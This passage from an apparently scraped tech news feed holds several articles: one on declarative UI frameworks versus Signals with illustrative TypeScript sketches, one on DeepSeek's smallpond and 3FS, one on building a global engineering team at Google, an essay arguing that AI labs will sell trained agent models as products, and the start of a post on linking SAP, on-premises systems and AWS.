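      if (currentEffect) subscribers.add(currentEffect);
      return value;
    },
    set(next: T) {
      value = next;
      // Re-run only the effects that actually read this signal.
      subscribers.forEach((fn) => fn());
    },
  };
}

function effect(fn: Subscriber) {
  currentEffect = fn;
  fn(); // the first run registers this effect's dependencies
  currentEffect = null;
}

const count = signal(0);
effect(() => console.log("count is", count.get()));
count.set(1); // re-runs only the effect above, wherever it lives in the UI

The dependency graph lives next to the data, not in the component tree.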

The trade-off is that freely accessible signals can get messy if every component in the UI view tree can update them. That’s why library authors often offer namespacing or scoping for signals, so you can define how far their influence extends without losing track of where updates come from. In addition, it leaves behind all the affordances of a declarative API, where the developer only has to declare the intended goal. Hence, developers might need extra help reasoning about state updates, such as a visual debugger for the state dependency computational graph.

For developers weighing their options, the trade-off is pretty clear: stick with React if your data aligns well with your UI and you value a straightforward, mature ecosystem. But if you repeatedly find your data graph crossing multiple parts of the UI, or you need to avoid re-renders at all costs, Signals could be your best bet. This can be hard to tell a priori, as both can evolve over time as the understanding of the domain changes and hence the requirements change. In the end, it's trade-offs.

Declarative escape hatches

This question transcends React and Signals. This trade-off plays itself out across the programming landscape: retained mode vs immediate mode, functional vs object-oriented, and in declarative vs imperative configuration management. Even in the world of database queries, where SQL wins by a large margin, there are still skirmishes with imperative alternatives like PL/SQL and Transact-SQL. In almost all cases, the desire for reduced complexity in managing state draws developers towards declarative systems, and the desire for performance pulls them away. Can a declarative system—one that focuses on describing the end state rather than step-by-step updates—be extended to handle edge cases requiring more granular performance?

Improving execution internals

One angle of attack is to keep the declarative API as is, and just improve a declarative system's ability to judge which computational branch to go down to get to the goal state. The current ability of React to judge what branch to examine is hampered by the limitations of Javascript in this regard.

  • Dynamic Types and References: JS arrays and objects are reference-based, lacking an efficient built-in mechanism for detecting which nested properties have changed. Structural equality checks grow expensive and quickly become impractical for large data.
  • Immutable-by-Convention: React and similar frameworks rely on immutability so they can compare references for performance. Yet even with disciplined immutability, the system can’t know exactly which pieces of your state changed unless you manually break them into discrete atoms or rely on advanced libraries.
  • Component Granularity: React treats a function or class as the smallest unit of re-render. Fine-grained updates would require skipping parts of a single function’s output—something that clashes with the idea of purely atomic render functions.

Let's try tackling each of these in turn.

What if we had true immutable complex values? A truly immutable language or runtime, like Clojure or Haskell, can efficiently detect changes via structural sharing. It knows exactly when something has changed, and can avoid computational branches it knows for sure haven't changed. The system wouldn't need heuristics to guess or require hints from the developer. The downside is that immutable values are grow-only, and most languages don't support their semantics by default. Hence, there would have to be some kind of expiration policy for the history of changes in an immutable value.

Perhaps instead, we can use version clocks to indicate change internally? Imagine attaching a version clock to each field or sub-object. When that field changes, its clock increments. This allows a more direct mapping of ‘property changed → which UI depends on it.’ In essence, it introduces partial reactivity: your runtime or compiler can skip re-renders for unaffected properties. On the plus side, this structure isn't ever-growing, like immutable data structures. And if everything is truly pure and transparent, you won’t get the wrong computations—at least in theory. But real apps often have side effects, dynamic property usage, concurrency concerns, or incomplete signals about exactly which bits of code are dependent on which state. That’s how “wrong” decisions or extra re-renders slip in, even in a system with perfectly immutable data or carefully maintained version vectors.
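
A sketch of the version-clock idea (illustrative, not a real framework API):

// One version clock per field; consumers compare clocks, not values.
class VersionedField<T> {
  version = 0;
  constructor(public value: T) {}
  set(next: T) {
    this.value = next;
    this.version++; // bump only this field's clock
  }
}

const position = new VersionedField({ x: 0, y: 0 });
const label = new VersionedField("untitled");

let seenPosition = position.version;
function renderPositionPanel() {
  if (position.version === seenPosition) return; // clock unchanged: skip
  seenPosition = position.version;
  console.log("re-render position panel", position.value);
}

label.set("rectangle");        // doesn't touch position's clock
renderPositionPanel();         // skipped
position.set({ x: 10, y: 5 });
renderPositionPanel();         // re-renders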

Even if branch prediction is solved with immutable values or version vectors that something changed, if your declarative system is still re-running entire ‘components’ or top-level functions, then you only solve half the problem. You know something changed, but you still lack a built-in way to skip re-rendering subparts of the UI unless you subdivide your data into separate states, each pinned to a unique piece of UI.

What about using algebraic effects for finer granularity than a single functional component? Algebraic effects could theoretically let you intercept specific sub-expressions within a single rendering function. Each sub-expression might read from a piece of state and produce an effect, so if that piece of state doesn’t change, the runtime can skip re-running that sub-expression. Hence, any state changes within a component are yielding effects that alter a UI View. I think if you squint a little, this is along the lines of what Signal-based frameworks do.

Lastly, there are algebraic incremental approaches like differential dataflow and DBSP that restrict operations for moving state to those that can be defined incrementally: for any previous input x, if the input changes to x + 𝚫, we can compute f(x + 𝚫) without recomputing f from scratch. This approach seems very promising, but I suspect there is a different kind of alignment problem here. Just like in CRDTs, while the merge might be algebraically correct, you might get semantically nonsensical merges. I suspect it might be the same for these algebraic incremental approaches.
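
The defining property, stated for the simplest (linear) case these systems exploit:

f(x + \Delta) = f(x) + f(\Delta)

so once f(x) is cached, processing an input change \Delta only costs f(\Delta), which is cheap when \Delta is small; non-linear operators need more machinery, but the goal is the same.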

Giving declarative policy hints

Perhaps any domain will have edge cases that need to be nudged by the developer. But instead of diving into the minutiae of when to re-render each sub-expression imperatively as an escape-hatch, one could imagine a higher-level, purely declarative policy system. In this approach, you’d define explicit relationships among various state slices and UI views. For instance, you might declare, “These three states are tightly coupled and should always update together,” or “This component’s render only depends on fields A, B, and C from the global state.”

The runtime could then use those policies to group updates intelligently, determining which components can or should re-render at the same time. This is less about micromanaging the exact lines of code to skip and more about giving the framework a bird’s-eye view of which parts of the data graph belong together.

In principle, this moves some complexity from low-level reactivity (like signals) into a set of higher-level declarations—an attempt to keep the developer experience more ‘big picture’ rather than diving into partial reactivity on a field-by-field basis. But implementing such a policy system is still far from trivial.

One major challenge is the need for a purely declarative way to define how state partitions map to UI partitions, so the runtime or compiler can interpret those policy statements and assemble an efficient dependency graph. Even then, developers typically end up labeling or grouping their data—a practice that feels a lot like signals, just at a coarser level—revealing how much low-level reactivity logic still lurks behind the declarative veneer.

It’s an intriguing middle ground. By defining relationships—rather than line-by-line checks—you’re nudging the system to do partial updates without stepping fully into an imperative approach. Yet, you still risk complexity if policies become too fragmented or if states have inter-dependencies that defy simple grouping. Ultimately, it remains an open question whether any such policy system could achieve the fine-grained performance benefits of Signals without reintroducing a fair amount of ‘reactivity bookkeeping’ behind the scenes.

The Tension in Declarative Systems

Ultimately, any purely declarative system is predicated on the idea that you describe what you want, and the framework figures out how to accomplish it. Once you start dictating precisely which parts of the system can skip reprocessing—and under what conditions—you’re veering into partial reactivity. You’re effectively telling the system how it should schedule updates, imposing custom rules on the execution plan.

Of course, you can graft fine-grained controls onto a declarative model, but each addition gradually erodes its simplicity. You might need to annotate or restructure code so the runtime can pinpoint which sub-expressions rely on specific pieces of data, while the framework itself maintains a specialized “update graph”—much like Signals. Inevitably, you’ve stepped away from a purely declarative approach into a hybrid that merges declarative goals with partial reactivity under the hood.

You can approach this issue asymptotically, but there’s no free lunch: staying fully declarative often means accepting broad recomputations that go beyond what’s strictly necessary, while trying to micro-optimize every expression leads you into describing how sub-expressions should update—edging into partial reactivity. Put differently, the deeper you dive into fine-grained updates, the less you can rely on a purely declarative “describe the goal” style, because you inevitably end up declaring which pieces of your code need to update and when, rather than just what the final state should be.

In other words, the more the system needs to handle fine-grained updates, the less purely declarative it becomes. You can blend paradigms, but that hybrid approach often demands more mental overhead and/or compile-time machinery.

End of the day

So, is it impossible for a declarative system to handle all edge cases with top-tier performance? Not strictly. You can embed partial reactivity or Signals-like mechanisms via deep immutability, version clocks, algebraic effects, or advanced compile steps. But each move in that direction redefines the purity of your declarative abstraction and ushers in added complexity.

If your data shape aligns with your UI and you don’t need hyper-optimized updates, a declarative framework remains a wonderful solution. But for edge cases—like real-time apps with interwoven data dependencies—other paradigms do a better job of pinpointing precisely what changed and when. After all, it’s hard to remain ‘purely declarative’ once you start asking the system to skip internal steps under certain conditions.

That’s the central tension: declarative frameworks elegantly solve the common case but inevitably bump into scenarios that push them beyond their comfort zone. There’s no perfect solution that’s both purely declarative and infinitely adaptable. As soon as you need the latter, you’re knocking on the door of an imperative stance on updates.

]]>
https://interjectedfuture.com/when-declarative-systems-break/ hacker-news-small-sites-43232549 Sun, 02 Mar 2025 17:12:25 GMT
<![CDATA[Understanding Smallpond and 3FS]]> thread link) | @mritchie712
March 2, 2025 | https://www.definite.app/blog/smallpond | archive.org

March 2, 202510 minute read

Mike Ritchie

I didn't have "DeepSeek releases distributed DuckDB" on my 2025 bingo card.

You may have stumbled across smallpond from Twitter/X/LinkedIn hype. From that hype, you might have concluded Databricks and Snowflake are dead 😂. Not so fast. The reality is, although this is interesting and powerful open source tech, it's unlikely to be widely used in analytics anytime soon. Here's a concise breakdown to help you cut through the noise.

We'll cover:

  1. what smallpond and its companion, 3FS, are
  2. if they're suitable for your use case and if so
  3. how you can use them

What is smallpond?

smallpond is a lightweight, distributed data processing framework recently introduced by DeepSeek. It extends DuckDB (typically a single-node analytics database) to handle larger datasets across multiple nodes. smallpond enables DuckDB to manage distributed workloads by using a distributed storage and compute system.

Key features:

  • Distributed Analytics: Allows DuckDB to handle larger-than-memory datasets by partitioning data and running analytics tasks in parallel.
  • Open Source Deployment: If you can manage to get it running, 3FS would give you powerful and performant storage at a fraction of the cost of alternatives.
  • Manual Partitioning: Data is manually partitioned by users, and smallpond distributes these partitions across nodes for parallel processing.

What is 3FS?

3FS, or Fire-Flyer File System, is a high-performance parallel file system also developed by DeepSeek. It's optimized specifically for AI and HPC workloads, offering extremely high throughput and low latency by using SSDs and RDMA networking technology. 3FS is the high-speed, distributed storage backend that smallpond leverages to get its breakneck performance. 3FS achieves a remarkable read throughput of 6.6 TiB/s on a 180-node cluster, which is significantly higher than many traditional distributed file systems.

How Can I Use It?

To start, same as any other python package, uv pip install smallpond. Remove uv if you like pain.

But to actually get the benefits of smallpond, it'll take much more work and depends largely on your data size and infrastructure:

  • Under 10TB: smallpond is likely unnecessary unless you have very specific distributed computing needs. A single-node DuckDB instance or a simpler storage solution will be easier to run and possibly more performant. To be candid, using smallpond at a smaller scale, without Ray/3FS, is likely slower than vanilla DuckDB and a good bit more complicated.
  • 10TB to 1PB: smallpond begins to shine. You'd set up a cluster (see below) with several nodes, leveraging 3FS or another fast storage backend to achieve rapid parallel processing.
  • Over 1PB (Petabyte-Scale): smallpond and 3FS were explicitly designed to handle massive datasets. At this scale, you'd need to deploy a larger cluster with substantial infrastructure investments.

Deployment typically involves:

  1. Setting up a compute cluster (AWS EC2, Google Compute Engine, or on-prem).
  2. Deploying 3FS on nodes with high-performance SSDs and RDMA networking.
  3. Installing smallpond via Python to run distributed DuckDB tasks across your cluster.

Steps #1 and #3 are really easy. Step #2 is very hard. 3FS is new, so there's no guide on how you would set it up on AWS or any other cloud (maybe DeepSeek will offer this?). You could certainly deploy it on bare metal, but you'd be descending into a lower level of DevOps hell.

Note: if you're in the 95% of companies in the under 10TB bucket, you should really try Definite.

I experimented with running smallpond with S3 swapped in for 3FS here, but it's unclear what, if any, performance gains you'd get over scaling up a single node for moderate-sized data.

Is smallpond for me?

tl;dr: probably not.

Whether you'd want to use smallpond depends on several factors:

  • Your Data Scale: If your dataset is under 10TB, smallpond adds unnecessary complexity and overhead. For larger datasets, it provides substantial performance advantages.
  • Infrastructure Capability: smallpond and 3FS require significant infrastructure and DevOps expertise. Without a dedicated team experienced in cluster management, this could be challenging.
  • Analytical Complexity: smallpond excels at partition-level parallelism but is less optimized for complex joins. For workloads requiring intricate joins across partitions, performance might be limited.

How Smallpond Works (Under the Hood)

Lazy DAG Execution
Smallpond uses lazy evaluation for operations like map(), filter(), and partial_sql(). It doesn't run these immediately. Instead, it builds a logical execution plan as a directed acyclic graph (DAG), where each operation becomes a node (e.g., SqlEngineNode, HashPartitionNode, DataSourceNode).

Nothing actually happens until you trigger execution explicitly with actions like:

  • write_parquet() — Writes data to disk
  • to_pandas() — Converts results to a pandas DataFrame
  • compute() — Forces computation explicitly
  • count() — Counts rows
  • take() — Retrieves a subset of rows

This lazy evaluation is efficient because it avoids unnecessary computations and optimizes the workflow.
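
smallpond itself is Python, but the lazy-DAG mechanism is language-agnostic. A TypeScript sketch of the general idea (illustrative only, not smallpond's actual API):

// Transformations append plan nodes; nothing executes yet.
type PlanNode = { op: string; args: unknown[]; inputs: PlanNode[] };

class LazyFrame {
  private constructor(private node: PlanNode) {}

  static source(path: string): LazyFrame {
    return new LazyFrame({ op: "source", args: [path], inputs: [] });
  }
  filter(predicate: string): LazyFrame {
    return new LazyFrame({ op: "filter", args: [predicate], inputs: [this.node] });
  }
  map(expr: string): LazyFrame {
    return new LazyFrame({ op: "map", args: [expr], inputs: [this.node] });
  }

  // An action walks the DAG and actually runs it.
  count(): number {
    return run(this.node);
  }
}

function run(node: PlanNode): number {
  node.inputs.forEach(run); // execute dependencies first
  console.log("executing", node.op, node.args);
  return 0; // a real engine would return query results here
}

// Three nodes are queued up; only count() triggers execution.
LazyFrame.source("data.parquet").filter("x > 0").map("x * 2").count();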

From Logical to Execution Plan
When you finally trigger an action, the logical plan becomes an execution plan made of specific tasks (e.g., SqlEngineTask, HashPartitionTask). These tasks are the actual work units distributed and executed by Ray.

Ray Core and Distribution
Smallpond’s distribution leverages Ray Core at the Python level, using partitions for scalability. Partitioning can be done manually, and Smallpond supports:

  • Hash partitioning (based on column values)
  • Even partitioning (by files or row counts)
  • Random shuffle partitioning

Each partition runs independently within its own Ray task, using DuckDB instances to process SQL queries. This tight integration with Ray emphasizes horizontal scaling (adding more nodes) rather than vertical scaling (larger, more powerful nodes). To use it at scale, you’ll need a Ray cluster. You can run one on your own infrastructure on a cloud provider (e.g. AWS), but if you just want to test this out, it'll be easier to get started with Anyscale (founded by Ray creators).

Conclusion

smallpond and 3FS offer powerful capabilities for scaling DuckDB analytics across large datasets. However, their complexity and infrastructure demands mean they're best suited for scenarios where simpler solutions no longer suffice. If you're managing massive datasets and already have robust DevOps support, smallpond and 3FS could significantly enhance your analytics capabilities. For simpler scenarios, sticking with a single-node DuckDB instance or using managed solutions remains your best option.

]]>
https://www.definite.app/blog/smallpond hacker-news-small-sites-43232410 Sun, 02 Mar 2025 17:00:30 GMT
<![CDATA[Lessons learned setting up a global engineering org at Google]]> thread link) | @gpi
March 2, 2025 | https://newsletter.eng-leadership.com/p/5-lessons-learned-setting-up-a-global | archive.org

It’s getting close to the start of the March cohort of the course Senior Engineer to Lead: Grow and thrive in the role. We start on March 11!

Here is what students of the last cohort are saying:

If you wish to learn the competencies needed to grow and thrive in the Lead role (Tech Lead (Staff), Team Lead, EM), this would be a great course for you.

I want to enroll!

Looking forward to seeing some of you there!

Let’s get back to this week’s thought.

The number one misconception is that adding new people to the team will make progress linearly better.

I’ve formed and scaled many different teams and orgs, and it has never been the case that adding a new person or a new team increases productivity in proportion to how many new people we add.

Especially not in the beginning. But with the right approach, we can optimize productivity and ensure that with every new person and team we add, there is an increase in business value.

Things that help with this the most?

It’s all about creating a good culture, inspiring teamwork, creating a good onboarding experience + empowering and uplifting your people.

Lucky for us, we have Chaitali with us today as a guest author.

She is a former Engineering Director at Google, and today she is sharing the lessons she learned when she was tasked at Google with setting up a whole new global org.

Let’s go straight into it. Chaitali, over to you!

My leadership gave me the green light to hire and grow a team of 30 in Bangalore, India.

Until then, I had only led a team on the US West Coast and I felt excited to learn how to build and manage a team in another country.

I did my homework to prepare for this opportunity → I talked to my coach, got mentorship from people who had done this before, and read recommended books.

A month later, I had to make my own playbook.

No one had done what I was about to attempt: building a new team halfway across the world during a pandemic. Everyone was working from home, and travel was impossible!

Today, I’ll share five lessons for leaders of global organizations.

I really like the Heath Brothers' books, especially The Power of Moments. This book explores how short, intense experiences can surprise us, lift us up, and even change who we are.

I doubted that the usual "assign a buddy" system would help our new hires ramp up while working from home during the pandemic. Especially when their buddy would be in a timezone 12 hours away.

We made a list of starter projects for each quarter, then we paired every new hire in India with an experienced engineer from the US. Working together on projects this way created stronger moments of connection between them.

Another example was creating moments of shared pain. We changed the team meeting time each month → This way, everyone could feel how tough it was to meet late at night or early in the morning.

This built shared pain and empathy, leading to stronger bonds between both teams!

A great team builds culture through repetition.

As a leader, you need to know what ideas you want as the foundation of your culture, then you need to find many everyday moments to say or show those ideas.

I realized early that to build an inclusive culture in my organization, we needed to change some practices from optional to necessary. Hand raises in video calls and notes shared after meetings were two such practices.

For a year or more, I asked for hand raises before speaking during meetings and I also requested written notes after each meeting.

Another investment I made was doing frequent small group coffee chats.

Keeping the group small → no more than 20 people, was key to fostering open dialogue. We rotated the timings for these as well to give everyone in the US and India equal opportunity to join. These chats were another channel to cultivate team culture.

I began using “our global team” for the whole organization and for specific areas, I'd say “the US team” or “the India team”. This was instead of “the remote team” or “the offshore team”.

Others caught on to this lingo, and it became part of our team culture over time!

The big time difference of about 12 hours and the unusual situation where no travel was possible made things tricky!

It forced me to repurpose many of my old leadership tools.

I have always been a delegation practitioner, but in this situation, I had to up that practice 10x! L. David Marquet’s Turn the Ship Around immensely helped me here.

I talked about the Leader-Leader model and the “I intend to” approach with my leadership team and we began using it, especially for roundtrip decisions between India and the US.

We invested time discussing the mechanics of implicit consent and explicit dissent and I knew we had adopted this model when I began waking up to messages like:

  • “I intend to deploy this release during my day. Please leave a message if you disagree.”

  • “I intend to finish hiring this senior engineer on <date> IST. Let me know if I shouldn’t.”

I could ignore most of these messages, but they also let me step in if I felt strongly.

Another old tool that didn’t work during the pandemic was the “in-person leadership summit."

My mentors suggested I bring my India and US leads together right after forming the new team, so we could share ideas and build connections.

Without travel, we could only have a virtual “golden hour” video call in the early morning or late evening of either timezone.

I turned to Priya Parker’s The Art of Gathering to design meaningful virtual meetings.

We invested in short, meaningful activities to make the most of our limited time and I made a conscious effort to stay away from activities that would feel awkward or fake to the team.

We formed stronger connections through these meetings than from a big summit.

A key leadership principle for me is what I call “actionable empathy" → you won’t understand your team’s struggles until you experience them yourself.

There was a power gap between my US and India teams.

My US leads had easier access to me and other stakeholders because of the time zone advantage and with no travel possible, it was up to me to apply actionable empathy in this situation.

One week, I bought room-darkening curtains for our guest bedroom, marked my calendar as out-of-office, and took a virtual trip to India.

I stayed up from 8 pm PT to 4 am PT doing meetings and 1:1s with my India team for most of that week.

Chai, samosas, and some Indian snacks helped make it feel more real!

My virtual trip strengthened my ties with the India team and it also changed how both parts of my organization interacted.

Another reason to pick that travel week was the virtual conference by Grace Hopper India (GHC). I got to attend a few of their sessions, which introduced me to some amazing women leaders.

That enabled me to make many great hires, including a director later down the line!

We may want to think our performance reviews are fair, but they often reflect human biases. Biases in performance evaluations disproportionately impact those further away from the leadership epicenter and this happens due to availability bias.

For example, we were reviewing candidates for Staff Engineer promotions and everyone recognized one candidate’s work.

This person gave several tech talks and often connected with senior leaders, while the other candidate did not seem to be very visible. They had fewer tech talks, and most senior leaders barely remembered speaking with them.

I asked the group if visibility was a criterion in our job ladder → It wasn’t. This led us to discuss ladder attributes. We discovered that both candidates had strong technical contributions and they also mentored and led junior engineers. Plus, each was an expert in their field!

The key difference between both candidates? Location! One was located on the US West Coast, and the other was located in India.

Once we started looking closely, we realized something important. Our India-based Staff Engineer candidate gave three tech talks at 11 PM their time. That’s pretty impressive!

If you run a global organization, act now to cut biases in performance reviews and promotions. This helps ensure that everyone feels valued!

I learned how crucial it is to adapt your leadership style and I learned to focus on building connections and showing real empathy.

My journey taught me how to build and lead larger organizations in many countries and the lessons I mentioned are scalable and suitable even for hybrid work.

Gregor here again!

To learn further, Chaitali also created a Notion template, where you can find activities that help virtual teams to increase connection.

And she has kindly given this template for free to Engineering Leadership readers for the next 30 days. Use the code: 6V5DRXI at the checkout or click the button below:

10 Meaningful Virtual Team Activities

Additionally, you can get this template and similar others for free by becoming a paid subscriber to her newsletter.

Special thanks to Chaitali for sharing her insights and experience.

Make sure to follow her on LinkedIn and also check out her newsletter, where she shares similar learnings from her 15+ year career in the engineering industry.

We are not over yet!

My friend Prasad Rao, who has also been a guest author on the newsletter with the article From Engineer to Principal Solutions Architect at AWS, has just launched his online course!

If you are looking to get better in Big Tech interviews, this might be a great course for you. He also gave a 10% discount to the Engineering Leadership readers, so use the code EL10 at the checkout to redeem it.

I want to check out the course!

Liked this article? Make sure to 💙 click the like button.

Feedback or addition? Make sure to 💬 comment.

Know someone that would find this helpful? Make sure to 🔁 share this post.

  • Join the Cohort course Senior Engineer to Lead: Grow and thrive in the role here.

  • Interested in sponsoring this newsletter? Check the sponsorship options here.

  • Take a look at the cool swag in the Engineering Leadership Store here.

  • Want to work with me? You can see all the options here.

You can find me on LinkedIn, X, Bluesky, Instagram or Threads.

If you wish to make a request on particular topic you would like to read, you can send me an email to info@gregorojstersek.com.

This newsletter is funded by paid subscriptions from readers like yourself.

If you aren’t already, consider becoming a paid subscriber to receive the full experience!

Check the benefits of the paid plan

You are more than welcome to find whatever interests you here and try it out in your particular case. Let me know how it went! Topics are normally about all things engineering related, leadership, management, developing scalable products, building teams etc.


]]>
https://newsletter.eng-leadership.com/p/5-lessons-learned-setting-up-a-global hacker-news-small-sites-43232333 Sun, 02 Mar 2025 16:54:29 GMT
<![CDATA[The Model Is the Product]]> thread link) | @pongogogo
March 2, 2025 | https://vintagedata.org/blog/posts/model-is-the-product | archive.org

There was a lot of speculation over the past years about what the next cycle of AI development would be. Agents? Reasoners? Actual multimodality?

I think it's time to call it: the model is the product.

All current factors in research and market development push in this direction.

  • Generalist scaling is stalling. This was the whole message behind the release of GPT-4.5: capacities are growing linearly while compute costs are on a geometric curve. Even with all the efficiency gains in training and infrastructure of the past two years, OpenAI can't deploy this giant model at a remotely affordable price.
  • Opinionated training is working much better than expected. The combination of reinforcement learning and reasoning means that models are suddenly learning tasks. It's not machine learning, it's not a base model either, it's a secret third thing. It's even tiny models suddenly getting scary good at math. It's coding models no longer just generating code but managing entire code bases by themselves. It's Claude playing Pokemon with very poor contextual information and no dedicated training.
  • Inference costs are in free fall. The recent optimizations from DeepSeek mean that all the available GPUs could cover a demand of 10k tokens per day from a frontier model for… the entire earth's population. There is nowhere near this level of demand. The economics of selling tokens no longer work for model providers: they have to move higher up in the value chain.

This is also an uncomfortable direction. All investors have been betting on the application layer. In the next stage of AI evolution, the application layer is likely to be the first to be automated and disrupted.

Shapes of models to come.

Over the past weeks, we have seen two prime example of this new generation of models as a product: OpenAI's DeepResearch and Claude Sonnet 3.7.

I've read a lot of misunderstandings about DeepResearch, which isn't helped by the multiplication of open and closed clones. OpenAI has not built a wrapper on top of O3. They have trained an entirely new model, able to perform search internally, without any external calls, prompts or orchestration:

The model learned the core browsing capabilities (searching, clicking, scrolling, interpreting files) (…) and how to reason to synthetize a large number of websites to find specific pieces of information or write comprehensive reports through reinforcement learning training on these browsing tasks.

DeepResearch is not a standard LLM, nor a standard chatbot. It's a new form of research language model, explicitly designed to perform search tasks end to end. The difference is immediately striking to everyone using it seriously: the model generates lengthy reports with a consistent structure and an underlying source-analysis process. In comparison, as Hanchung Lee underlined, all the other DeepSearch offerings, including the Perplexity and Google variants, are just your usual models with a few twists:

Google’s Gemini and Perplexity’s chat assistants also offer “Deep Research” features, but neither has published any literature on how they optimized their models or systems for the task or any substaintial quantitative evaluations (…) We will make an assumption that the fine-tuning work done is non-substantial.

Anthropic has been laying out their current vision ever more clearly. In December, they introduced a controversial but, to my mind, correct definition of agent models. Similarly to DeepSearch, an agent has to perform the targeted tasks internally: they "dynamically direct their own processes and tool usage, maintaining control over how they accomplish tasks".

What most agent startups are currently building is not agents, it's workflows, that is "systems where LLMs and tools are orchestrated through predefined code paths." Workflows may still bring some value, especially for vertical adaptations. Yet, to anyone currently working in the big labs it's strikingly obvious that all major progress in autonomous systems will be through redesigning the models in the first place.

We had a very concrete demonstration of this with the release of Claude 3.7, a model primarily trained with complex code use cases in mind. All the workflow adaptations like Devin got a major boost on SWE benchmarks.

To give another example at a much smaller scale: at Pleias we're currently working on automating RAG. Current RAG systems are a lot of interconnected yet brittle workflows: routing, chunking, reranking, query interpretation, query expansion, source contextualization, search engineering. With the evolving training tech stack, there is real potential to bundle all these processes into two separate yet interconnected models, one for data preparation and the other for search/retrieval/report generation. This requires an elaborate synthetic pipeline and entirely new reward functions for reinforcement learning. Actual training, actual research.

What all this means in practice: displacing complexity. Training anticipates a wide range of actions and edge cases, so that deployment becomes much simpler. But in this process most of the value is now created and, likely in the end, captured by the model trainer. In short, Claude aims to disrupt and replace current workflows, like this basic "agent" system from LlamaIndex:

Llama Index Basic Agent

With this:

Claude Agent

Training or being trained on.

To reassert: the big labs are not advancing with a hidden agenda. While they can be opaque at times, they are laying it all out in the open: they will bundle, they will go up the application layer, and they will attempt to capture most of the value there. The commercial consequences are quite clear. Naveen Rao, the Gen AI VP of Databricks, phrased it quite well:

all closed AI model providers will stop selling APIs in the next 2-3 years. Only open models will be available via APIs (…) Closed model providers are trying to build non-commodity capabilities and they need great UIs to deliver those. It's not just a model anymore, but an app with a UI for a purpose.

So what is happening right now is just a lot of denial. The honeymoon period between model providers and wrappers is over. Things could evolve in several directions:

  • Claude Code and DeepSearch are early technical and product experiments in this direction. You will notice that DeepSearch is not available through an API; it is only used to create value for the premium subscriptions. Claude Code is a minimalistic terminal integration. Weirdly enough, while Claude 3.7 works perfectly in Claude Code, Cursor struggles with it, and I've already seen several high-end users cancelling their subscriptions as a result. Actual LLM agents don't care about pre-existing workflows: they replace them.
  • The most high-profile wrappers are now scrambling to become hybrid AI training companies. They do have some training capacities, though very little advertised. One of Cursor's main assets is their small autocompletion model. WindSurf has their internal cheap code model, Codium. Perplexity has always relied on home-grown classifiers for routing and recently pivoted to training their own DeepSeek variant for search purposes.
  • For smaller wrappers, not much will change, except a likely increased reliance on agnostic inference providers if the big labs entirely let go of this market. I also expect to see much more focus on UI, which is still dramatically underestimated, as even more generalist models are likely to bundle common deployment tasks, especially for RAG.

In short, the dilemma for most successful wrappers is simple: training or being trained on. What they are doing right now is not only free market research for the big labs but, since all outputs are ultimately generated through model providers, free data design and generation as well.

What will happen afterwards is anyone's guess. Successful wrappers do have the advantage of knowing their vertical well and accumulating a lot of precious user feedback. Yet, in my experience, it's easier to go down from the model layer to the application layer than to build entirely new training capacities from scratch. Wrappers may not have been helped by their investors either. From what I overheard, there is such a negative polarization against training that they almost have to hide what is going to be their most critical value: neither Cursor's small model nor Codium is properly documented at the moment.

Reinforcement learning was not priced in.

This brings me to the actual painful part: currently all AI investments are correlated. Funds are operating under the following assumptions:

  • The real value lies exclusively in an application layer, independent from the model layer, that is best positioned to disrupt existing markets.
  • Model providers will only sell tokens at an ever-lower price, making wrappers in turn more profitable.
  • Wrapping closed models will satisfy all existing demand, even in regulated sectors with long-lasting concerns over external dependencies.
  • Building any training capacity is just a waste of time. This covers not only pre-training but all forms of training.

I'm afraid this increasingly looks like an adventurous bet and an actual market failure to accurately price in the latest technical developments, especially in RL. In the current economic ecosystem, venture funds are meant to find uncorrelated investments. They will not beat the S&P 500, but that's not what larger institutional investors are looking for: they want to bundle risks, to ensure that in a bad year at least some things will work out. Model training is a textbook example of this: lots of potential for disruption in a context where most western economies are on course for a recession. And yet model trainers can't raise, or at least not in the usual way. Prime Intellect is one of the few new western AI training companies with a clear potential to become a frontier lab. Yet, despite their achievements, including the training of the first decentralized LLM, they have struggled to raise more than your usual wrapper.

Beyond that, aside from the big labs, the current training ecosystem is very tiny. You can count all these companies on your hands: Prime Intellect, Moondream, Arcee, Nous, Pleias, Jina, the HuggingFace pretraining team (actually tiny)… Along with a few more academic actors (Allen AI, Eleuther…), they build and support most of the current open infrastructure for training. In Europe, I know that at least 7-8 LLM projects will integrate the Common Corpus and some of the pretraining tools we developed at Pleias; the rest will be fineweb, and likely post-training instruction sets from Nous or Arcee.

There is something deeply wrong in the current funding environment. Even OpenAI senses it now. Lately, there has been some palpable irritation at the lack of "vertical RL" in the current Silicon Valley startup landscape. I believe the message comes straight from Sam Altman and will likely result in some adjustment in the next YC batch, but it points to a larger shift: soon the big labs' select partners won't be API customers but associated contractors involved in the earlier training stages.

If the model is the product, you cannot necessarily build it alone. Search and code are easy low-hanging fruit: they have been major use cases for two years, the market is nearly mature, and you can ship a new Cursor in a few months. Many of the most lucrative AI use cases of the future are not at this advanced stage of development; typically, think about all those rule-based systems that still rule most of the world economy… Small dedicated teams with cross-expertise and a high level of focus may be best positioned to tackle this, eventually becoming potential acquihires once the initial groundwork is done. We could see the same pipeline on the UI side: some preferred partners getting exclusive API access to closed specialized models, provided they get on the road to business acquisition.

I haven't mentioned DeepSeek, nor Chinese labs so far, simply because DeepSeek is already one step further: not the model as a product, but the model as a universal infrastructure layer. Like OpenAI and Anthropic, Liang Wenfeng lays his plans out in the open:

We believe that the current stage is an explosion of technological innovation, not an explosion of applications (…) If a complete upstream and downstream industrial ecosystem is formed, then there is no need for us to make applications ourselves. Of course, there is no obstacle for us to make applications if needed, but research and technological innovation will always be our first priority.

At this stage, working only on applications is like "fighting the next wars with last war generals". I'm afraid we're at the point where many in the west are not even aware the last war is over.

]]>
https://vintagedata.org/blog/posts/model-is-the-product hacker-news-small-sites-43232270 Sun, 02 Mar 2025 16:48:43 GMT
<![CDATA[Interconnecting SAP, On-Premises and AWS]]> thread link) | @lockedinspace
March 2, 2025 | https://lockedinspace.com/posts/003.html | archive.org

This post is handwritten; no LLMs were used to write or mock this up.
Lately, I have been working on projects that involve connecting on-premises data centers with SAP RISE/ECS.
Although there are multiple approaches to achieving this, if your business case allows it, introducing a third player into the equation (Using an AWS account as a router mimicking a hub-and-spoke model [1]) can provide the following benefits:

However, it can also introduce challenges, covered below. Keep in mind that this topology has been discussed by AWS previously [2]. Having said this, let me go deeper into the points stated above.

[+] Govern the network communication, making it easier to solve network problems.

Having control of the network gives you more flexibility when diagnosing errors. Once the communication between your on-premises infrastructure and AWS is established and proven functional, you can focus on troubleshooting the other parts. By narrowing down the issue in this way, you simplify the resolution process.


